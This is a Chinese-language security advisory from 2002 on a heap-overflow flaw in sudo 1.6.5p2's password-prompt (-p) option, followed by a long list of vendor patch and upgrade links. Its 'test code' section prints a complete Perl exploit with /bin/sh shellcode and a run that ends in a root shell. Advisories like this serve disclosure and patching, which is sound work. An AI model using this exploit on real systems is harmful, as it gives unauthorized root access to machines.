Sudo密码提示存在漏洞发布时间:2002-04-26 更新时间:2002-04-26 严重程度:高 威胁程度:本地管理员权限 错误类型:边界检查错误 利用方式:服务器模式 受影响系统 Sudo 1.6.5p2详细描述 sudo是流行的允许用户以其他用户权限执行命令的工具。 sudo有使用户指定密码提示的功能,在解析-p参数的时候,用户可以指定字符来扩展使用主机名还是用户名,而对名字的长度检查不正确,可导致利用堆破坏来执行任意命令。 此选项决定于是否编译时支持,不过使用PAM支持的两进制支持此选项, 系统上主机名长度是可利用点之一。 测试代码 [venglin@clitoris sudo-1.6.5p2]$ cat babunia.pl $sudo = $ARGV[0]; $prompt = "h%h%h%h%aaaaaaaaaaaaaaaaaaaah%"; $prepad = 266; $postpad = 512; $retloc = hex(`objdump -R $sudo | grep '\\<_exit\\>' | cut -f1 -d' '`); $retad = 0x8063b10; $align = 20; print "Prompt: $prompt\n"; print "Prepad: $prepad\n"; print "Postpad: $postpad\n"; print "Align: $align\n"; print "_exit() @ ", sprintf("0x%x\n", $retloc); print "shellcode @ ", sprintf("0x%x\n", $retad); $testcode = "\xeb" . chr($align); $testcode .= "\x90" x $align; $testcode .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"; $testcode .= "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"; $testcode .= "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; $frame = pack('l', 0x01010101); $frame .= pack('l', $retloc-12); $frame .= pack('l', $retad); $path = "a" x $prepad; $path .= $frame; $path .= $testcode; $path .= "a"x($postpad - length($testcode)); system($sudo, "-p", $prompt, $path); [venglin@clitoris sudo-1.6.5p2]$ perl ./babunia.pl ./sudo Prompt: h%h%h%h%aaaaaaaaaaaaaaaaaaaah% Prepad: 266 Postpad: 512 Align: 20 _exit() @ 0x805fe40 shellcode @ 0x8063b10 litorisclitorisclitorisclitoris%aaaaaaaaaaaaaaaaaaaah% Sorry, try again. litorisclitorisclitorisclitoris%aaaaaaaaaaaaaaaaaaaaI ¨¨ry again. litorisclitorisclitorisclitoris%aaaaaaaaaaaaaaaaaaaaI ¨¨ry again. ./sudo: 3 incorrect password attempts # id uid=0(root) gid=1000(users) egid=0(root) groups=1000(users),6(disk),23(audio),24(video) 解决方案 chmod a-s 来去掉SUDO的S位或者去掉/etc/sudoers中所有条目。 下载补丁: Todd Miller Sudo 1.6: Todd Miller Upgrade sudo-1.6.6.tar.gz ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz Todd Miller Sudo 1.6.1: Todd Miller Upgrade sudo-1.6.6.tar.gz ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz Todd Miller Sudo 1.6.2: Todd Miller Upgrade sudo-1.6.6.tar.gz ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz Debian Upgrade sudo_1.6.2p2-2.2_alpha.deb http://security.debian.org/dists/stable/updates/main/binary-alpha/sudo_1.6.2p2-2.2_alpha.deb Debian Upgrade sudo_1.6.2p2-2.2_arm.deb http://security.debian.org/dists/stable/updates/main/binary-arm/sudo_1.6.2p2-2.2_arm.deb Debian Upgrade sudo_1.6.2p2-2.2_i386.deb http://security.debian.org/dists/stable/updates/main/binary-i386/sudo_1.6.2p2-2.2_i386.deb Debian Upgrade sudo_1.6.2p2-2.2_m68k.deb http://security.debian.org/dists/stable/updates/main/binary-m68k/sudo_1.6.2p2-2.2_m68k.deb Debian Upgrade sudo_1.6.2p2-2.2_powerpc.deb http://security.debian.org/dists/stable/updates/main/binary-powerpc/sudo_1.6.2p2-2.2_powerpc.deb Debian Upgrade sudo_1.6.2p2-2.2_sparc.deb http://security.debian.org/dists/stable/updates/main/binary-sparc/sudo_1.6.2p2-2.2_sparc.deb Todd Miller Sudo 1.6.3 p7: Slackware Patch sudo.tgz ftp://ftp.slackware.com/pub/slackware/slackware-8.0/patches/packages/sudo.tgz Slackware 8.0. Todd Miller Upgrade sudo-1.6.6.tar.gz ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz Todd Miller Sudo 1.6.3 p6: Todd Miller Upgrade sudo-1.6.6.tar.gz ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz Todd Miller Sudo 1.6.3 p5: Todd Miller Upgrade sudo-1.6.6.tar.gz ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz Todd Miller Sudo 1.6.3 p4: Slackware Patch sudo.tgz ftp://ftp.slackware.com/pub/slackware/slackware-7.1/patches/packages/sudo.tgz Slackware 7.1. Todd Miller Upgrade sudo-1.6.6.tar.gz ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz Todd Miller Sudo 1.6.3 p3: Todd Miller Upgrade sudo-1.6.6.tar.gz ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz Todd Miller Sudo 1.6.3 p2: Todd Miller Upgrade sudo-1.6.6.tar.gz ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz Todd Miller Sudo 1.6.3 p1: Todd Miller Upgrade sudo-1.6.6.tar.gz ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz Todd Miller Sudo 1.6.3: Todd Miller Upgrade sudo-1.6.6.tar.gz ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz Todd Miller Sudo 1.6.4 p2: Todd Miller Upgrade sudo-1.6.6.tar.gz ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz Todd Miller Sudo 1.6.4 p1: Conectiva Upgrade sudo-1.6.6-1U50_1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/sudo-1.6.6-1U50_1cl.i386.rpm Conectiva Upgrade sudo-1.6.6-1U50_1cl.src.rpm ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/sudo-1.6.6-1U50_1cl.src.rpm Source RPM. Conectiva Upgrade sudo-1.6.6-1U50_1cl.src.rpm ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/sudo-1.6.6-1U50_1cl.src.rpm Source RPM. Conectiva Upgrade sudo-1.6.6-1U50_1cl.src.rpm ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/sudo-1.6.6-1U50_1cl.src.rpm Source RPM. Conectiva Upgrade sudo-1.6.6-1U51_1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/5.1/i386/sudo-1.6.6-1U51_1cl.i386.rpm Conectiva Upgrade sudo-1.6.6-1U51_1cl.src.rpm ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/sudo-1.6.6-1U51_1cl.src.rpm Source RPM. Conectiva Upgrade sudo-1.6.6-1U60_1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sudo-1.6.6-1U60_1cl.i386.rpm Conectiva Upgrade sudo-1.6.6-1U60_1cl.src.rpm ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/sudo-1.6.6-1U60_1cl.src.rpm Source RPM. Conectiva Upgrade sudo-1.6.6-1U70_1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sudo-1.6.6-1U70_1cl.i386.rpm Conectiva Upgrade sudo-1.6.6-1U70_1cl.src.rpm ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/sudo-1.6.6-1U70_1cl.src.rpm Source RPM. Conectiva Upgrade sudo-1.6.6-1U8_1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/sudo-1.6.6-1U8_1cl.i386.rpm Conectiva Upgrade sudo-1.6.6-1U8_1cl.src.rpm ftp://atualizacoes.conectiva.com.br/8/SRPMS/sudo-1.6.6-1U8_1cl.src.rpm Source RPM. Conectiva Upgrade sudo-doc-1.6.6-1U50_1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/5.0/i386/sudo-doc-1.6.6-1U50_1cl.i386.rpm Conectiva Upgrade sudo-doc-1.6.6-1U50_1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/sudo-doc-1.6.6-1U50_1cl.i386.rpm Conectiva Upgrade sudo-doc-1.6.6-1U50_1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/sudo-doc-1.6.6-1U50_1cl.i386.rpm Conectiva Upgrade sudo-doc-1.6.6-1U51_1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/5.1/i386/sudo-doc-1.6.6-1U51_1cl.i386.rpm Conectiva Upgrade sudo-doc-1.6.6-1U60_1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sudo-doc-1.6.6-1U60_1cl.i386.rpm Conectiva Upgrade sudo-doc-1.6.6-1U70_1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sudo-doc-1.6.6-1U70_1cl.i386.rpm Conectiva Upgrade sudo-doc-1.6.6-1U8_1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/sudo-doc-1.6.6-1U8_1cl.i386.rpm Todd Miller Upgrade sudo-1.6.6.tar.gz ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz Conectiva Upgrade sudo-1.6.6-1U50_1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/5.0/i386/sudo-1.6.6-1U50_1cl.i386.rpm Conectiva Upgrade sudo-1.6.6-1U50_1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/sudo-1.6.6-1U50_1cl.i386.rpm Todd Miller Sudo 1.6.4: Todd Miller Upgrade sudo-1.6.6.tar.gz ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz Mandrake Upgrade sudo-1.6.4-3.1mdk.i586.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 7.1 i586. Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.0 PPC Source RPM. Mandrake Upgrade sudo-1.6.4-3.1mdk.i586.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.1 i586. Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.1 i586 Source RPM. Mandrake Upgrade sudo-1.6.4-3.1mdk.ia64.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.1 ia64. Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.1 ia64 Source RPM. Mandrake Upgrade sudo-1.6.4-3.1mdk.i586.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.2 i586. Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.2 i586 Source RPM. Mandrake Upgrade sudo-1.6.4-3.1mdk.ppc.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.2 PPC. Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.2 PPC Source RPM. Mandrake Upgrade sudo-1.6.4-3.1mdk.i586.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Corporate Server 1.0.1. Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Corporate Server 1.0.1 Source RPM. Mandrake Upgrade sudo-1.6.4-3.1mdk.i586.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Single Network Firewall 7.2. Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Single Network Firewall 7.2 Source RPM. Red Hat Upgrade sudo-1.6.5p2-1.6x.1.src.rpm ftp://updates.redhat.com/6.2/en/powertools/SRPMS/sudo-1.6.5p2-1.6x.1.src.rpm Source RPM. Red Hat Upgrade sudo-1.6.5p2-1.6x.1.alpha.rpm ftp://updates.redhat.com/6.2/en/powertools/alpha/sudo-1.6.5p2-1.6x.1.alpha.rpm Red Hat Upgrade sudo-1.6.5p2-1.6x.1.i386.rpm ftp://updates.redhat.com/6.2/en/powertools/i386/sudo-1.6.5p2-1.6x.1.i386.rpm Red Hat Upgrade sudo-1.6.5p2-1.6x.1.sparc.rpm ftp://updates.redhat.com/6.2/en/powertools/sparc/sudo-1.6.5p2-1.6x.1.sparc.rpm Red Hat Upgrade sudo-1.6.5p2-1.7x.1.src.rpm ftp://updates.redhat.com/7.0/en/os/SRPMS/sudo-1.6.5p2-1.7x.1.src.rpm Source RPM. Red Hat Upgrade sudo-1.6.5p2-1.7x.1.alpha.rpm ftp://updates.redhat.com/7.0/en/os/alpha/sudo-1.6.5p2-1.7x.1.alpha.rpm Red Hat Upgrade sudo-1.6.5p2-1.7x.1.i386.rpm ftp://updates.redhat.com/7.0/en/os/i386/sudo-1.6.5p2-1.7x.1.i386.rpm Red Hat Upgrade sudo-1.6.5p2-1.7x.1.src.rpm ftp://updates.redhat.com/7.1/en/os/SRPMS/sudo-1.6.5p2-1.7x.1.src.rpm Source RPM. Red Hat Upgrade sudo-1.6.5p2-1.7x.1.alpha.rpm ftp://updates.redhat.com/7.1/en/os/alpha/sudo-1.6.5p2-1.7x.1.alpha.rpm Red Hat Upgrade sudo-1.6.5p2-1.7x.1.i386.rpm ftp://updates.redhat.com/7.1/en/os/i386/sudo-1.6.5p2-1.7x.1.i386.rpm Red Hat Upgrade sudo-1.6.5p2-1.7x.1.ia64.rpm ftp://updates.redhat.com/7.1/en/os/ia64/sudo-1.6.5p2-1.7x.1.ia64.rpm Red Hat Upgrade sudo-1.6.5p2-1.7x.1.src.rpm ftp://updates.redhat.com/7.2/en/os/SRPMS/sudo-1.6.5p2-1.7x.1.src.rpm Source RPM. Red Hat Upgrade sudo-1.6.5p2-1.7x.1.i386.rpm ftp://updates.redhat.com/7.2/en/os/i386/sudo-1.6.5p2-1.7x.1.i386.rpm Red Hat Upgrade sudo-1.6.5p2-1.7x.1.ia64.rpm ftp://updates.redhat.com/7.2/en/os/ia64/sudo-1.6.5p2-1.7x.1.ia64.rpm Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 7.1 i586 Source RPM. Mandrake Upgrade sudo-1.6.4-3.1mdk.i586.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 7.2 i586. Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 7.2 i586 Source RPM. Mandrake Upgrade sudo-1.6.4-3.1mdk.i586.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.0 i586. Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.0 i586 Source RPM. Mandrake Upgrade sudo-1.6.4-3.1mdk.ppc.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.0 PPC. Todd Miller Sudo 1.6.5 p2: Global InterSec Patch sudo-1.6.5p3.patch http://www.globalintersec.com/adv/files/sudo-1.6.5p3.patch Unofficial source code patch from Global InterSec. NetBSD Patch netbsd-sudo-pwprompt.patch http://downloads.securityfocus.com/vulnerabilities/patches/netbsd-sudo-pwprompt.patch Patch for the NetBSD port of sudo 1.6.5p2, for pkgsrc/security/sudo/patches. Todd Miller Upgrade sudo-1.6.6.tar.gz ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz OpenBSD Patch 002_sudo.patch ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.1/common/002_sudo.patch Patch for the OpenBSD 3.1 port of sudo. Todd Miller Sudo 1.6.5 p1: Slackware Upgrade sudo-1.6.6-i386-1.tgz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/sudo-1.6.6-i386-1.tgz Slackware -current. Todd Miller Upgrade sudo-1.6.6.tar.gz ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz Todd Miller Sudo 1.6.5: Todd Miller Upgrade sudo-1.6.6.tar.gz ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz 相关信息 Global InterSec Research (lists@globalintersec.com) 参考:http://archives.neohapsis.com/archives/bugtraq/2002-04/0349.html |
